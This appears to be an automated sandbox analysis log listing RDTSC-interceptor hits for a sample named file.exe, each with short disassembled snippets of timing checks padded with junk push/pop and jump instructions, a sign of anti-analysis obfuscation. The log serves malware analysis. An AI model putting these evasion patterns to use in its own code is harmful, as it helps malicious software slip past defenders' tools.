Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F696F8 second address: F6971B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAF7914BEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pushad 0x00000011 jl 00007FAF7914BEC6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6971B second address: F69724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69724 second address: F6972A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6972A second address: F6972E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69266 second address: F692BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED0h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007FAF7914BECDh 0x00000011 push edi 0x00000012 jmp 00007FAF7914BED9h 0x00000017 pop edi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FAF7914BED6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F692BE second address: F692CA instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF78D3F52Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F693F7 second address: F69400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69400 second address: F69428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF78D3F539h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69428 second address: F69444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69444 second address: F6945D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FAF78D3F531h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6945D second address: F69461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BB39 second address: F8BB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BB3F second address: F8BB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BB43 second address: F8BB8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FAF78D3F540h 0x0000000f jnp 00007FAF78D3F52Eh 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8E02E second address: F8E064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAF7914BED0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FAF7914BEC6h 0x00000016 jp 00007FAF7914BEC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95D3D second address: F95D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95D43 second address: F95D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F945A1 second address: F945BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FAF78D3F526h 0x0000000c jmp 00007FAF78D3F52Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F945BB second address: F945D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED4h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F945D5 second address: F945DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F945DD second address: F945F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9475C second address: F94760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95083 second address: F9509F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF7914BECCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FAF7914BEE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9AAD4 second address: F9AAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF78D3F526h 0x0000000a pop edx 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9AAE3 second address: F9AB0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAF7914BECAh 0x0000000e jmp 00007FAF7914BECDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB49B second address: FAB4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007FAF78D3F526h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB4AB second address: FAB4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB4C4 second address: FAB4C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB4C9 second address: FAB4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007FAF7914BECBh 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB4E4 second address: FAB4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB4EA second address: FAB503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA8A2B second address: FA8A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FAF78D3F526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA8A37 second address: FA8A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA8A3B second address: FA8A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8053 second address: FB8059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7EC7 second address: FB7ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA8DD second address: FBA944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FAF7914BED4h 0x00000019 jc 00007FAF7914BEC6h 0x0000001f push eax 0x00000020 pop eax 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007FAF7914BECAh 0x00000028 jmp 00007FAF7914BECEh 0x0000002d jnl 00007FAF7914BEC6h 0x00000033 popad 0x00000034 popad 0x00000035 push esi 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA780 second address: FBA78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA78B second address: FBA78F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD805 second address: FBD819 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAF78D3F526h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FAF78D3F528h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD37A second address: FBD385 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007FAF7914BEC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD385 second address: FBD38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD38E second address: FBD3BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FAF7914BEC6h 0x00000015 jnl 00007FAF7914BEC6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD3BC second address: FBD3DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF78D3F536h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD3DC second address: FBD3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD3E0 second address: FBD3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFD44 second address: FBFD50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007FAF7914BEC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD848A second address: FD8494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAF78D3F526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD72A2 second address: FD72A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD72A6 second address: FD72AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD72AC second address: FD72B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD740F second address: FD7414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD76A8 second address: FD76AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD76AE second address: FD76BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7828 second address: FD782C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD782C second address: FD7839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7839 second address: FD7848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jg 00007FAF7914BECCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7848 second address: FD7857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FAF78D3F52Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7857 second address: FD785B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD785B second address: FD786D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF78D3F52Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD786D second address: FD7873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7AFC second address: FD7B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7B00 second address: FD7B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FAF7914BECEh 0x0000000c jmp 00007FAF7914BECAh 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7B20 second address: FD7B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7B25 second address: FD7B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7CE2 second address: FD7CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7CE8 second address: FD7D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED8h 0x00000009 popad 0x0000000a jmp 00007FAF7914BECDh 0x0000000f jnc 00007FAF7914BED2h 0x00000015 js 00007FAF7914BECEh 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7D2E second address: FD7D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FAF78D3F53Fh 0x0000000b jmp 00007FAF78D3F52Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7E96 second address: FD7EA2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF7914BEC6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7EA2 second address: FD7EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FAF78D3F526h 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 jmp 00007FAF78D3F52Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDAE09 second address: FDAE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FAF7914BEC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDAEB7 second address: FDAEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDC6BC second address: FDC6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDC6D5 second address: FDC6E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F52Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDC6E7 second address: FDC6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDFFCE second address: FDFFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B101A4 second address: 4B101CC instructions: 0x00000000 rdtsc 0x00000002 call 00007FAF7914BED2h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF7914BECDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B101CC second address: 4B101D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B101D2 second address: 4B101D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B00008 second address: 4B0000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0000C second address: 4B00027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B00027 second address: 4B0004B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0004B second address: 4B0004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0004F second address: 4B00053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B00053 second address: 4B00059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B00059 second address: 4B0005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0005F second address: 4B00063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B00063 second address: 4B00067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40039 second address: 4B4003D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4003D second address: 4B40050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F52Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40050 second address: 4B400C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7914BECFh 0x00000009 and eax, 0E6EDE4Eh 0x0000000f jmp 00007FAF7914BED9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FAF7914BED0h 0x0000001b add si, AAC8h 0x00000020 jmp 00007FAF7914BECBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FAF7914BED5h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD00DE second address: 4AD012A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, cx 0x0000000e mov eax, 081F33BFh 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov ebx, ecx 0x00000018 pushfd 0x00000019 jmp 00007FAF78D3F52Ch 0x0000001e adc ecx, 73E5DAA8h 0x00000024 jmp 00007FAF78D3F52Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD012A second address: 4AD012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD012E second address: 4AD0134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0134 second address: 4AD017D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7914BED8h 0x00000009 add ecx, 06088838h 0x0000000f jmp 00007FAF7914BECBh 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAF7914BED1h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD017D second address: 4AD0183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0183 second address: 4AD0187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
